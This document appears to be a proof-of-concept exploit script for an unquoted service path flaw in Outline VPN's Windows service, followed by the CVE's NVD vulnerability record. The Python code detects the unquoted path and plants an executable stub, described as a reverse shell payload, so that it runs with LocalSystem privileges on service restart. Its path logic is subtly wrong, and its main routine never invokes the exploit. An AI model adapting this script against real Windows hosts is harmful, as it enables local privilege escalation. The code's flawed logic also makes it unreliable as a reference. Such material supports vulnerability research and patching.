CVE-2023-54331

# CVE-2023-54331 PoC - Outline Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in Outline VPN # Author: Security Researcher # Target: Outline VPN <= 1.6.0 import os import subprocess import time def check_vulnerable(): """Check if OutlineService has unquoted path vulnerability""" try: result = subprocess.run( ['sc', 'qc', 'OutlineService'], capture_output=True, text=True ) output = result.stdout # Check if BINARY_PATH_NAME exists without quotes if 'BINARY_PATH_NAME' in output: for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() # Vulnerability exists if path has spaces and no quotes if ' ' in path and not (path.startswith('"') and path.endswith('"')): return True, path return False, None except Exception as e: print(f"Error checking vulnerability: {e}") return False, None def create_malicious_executable(): """Create a reverse shell payload""" # This would contain actual malicious code # For demonstration purposes only - do not use for malicious purposes malicious_code = b'MZ' + b'\x00' * 100 # Minimal PE header return malicious_code def exploit_unquoted_path(target_dir): """Exploit unquoted service path by placing malicious executable""" # Determine which path component to target path_parts = target_dir.split('\\') # For C:\Program Files\Outline\OutlineService.exe # Target: C:\Program Files\OutlineService.exe if len(path_parts) >= 2: exploit_path = os.path.join(path_parts[0], path_parts[1] + 'OutlineService.exe') try: # Create malicious executable at the unquoted path with open(exploit_path, 'wb') as f: f.write(create_malicious_executable()) print(f"[+] Malicious executable created at: {exploit_path}") print("[+] Waiting for service restart...") print("[+] When OutlineService restarts, it will execute our payload with LocalSystem privileges") return True except PermissionError: print("[-] Permission denied - need elevated privileges") return False return False def main(): print("=" * 60) print("CVE-2023-54331 - Outline VPN Unquoted Service Path Exploit") print("=" * 60) vulnerable, service_path = check_vulnerable() if vulnerable: print(f"[+] Vulnerability confirmed!") print(f"[+] Service path: {service_path}") print("[+] System is vulnerable to unquoted service path attack") # Extract directory from path path_parts = service_path.replace('"', '').strip().split() if path_parts: target_dir = path_parts[0] print(f"[~] Target directory for exploitation: {os.path.dirname(target_dir)}") else: print("[-] Service not found or not vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2023-54331", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:00.333", "lastModified": "2026-02-02T16:16:17.677", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Outline 1.6.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the OutlineService executable to inject malicious code that will be executed with LocalSystem permissions."}, {"lang": "es", "value": "Outline 1.6.0 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio sin comillas en el ejecutable OutlineService para inyectar código malicioso que se ejecutará con permisos de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getoutline:outline:-:*:*:*:*:*:*:*", "matchCriteriaId": "B6E4B567-51AE-412C-A250-E356746834DF"}]}]}], "references": [{"url": "https://getoutline.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51128", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/outline-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}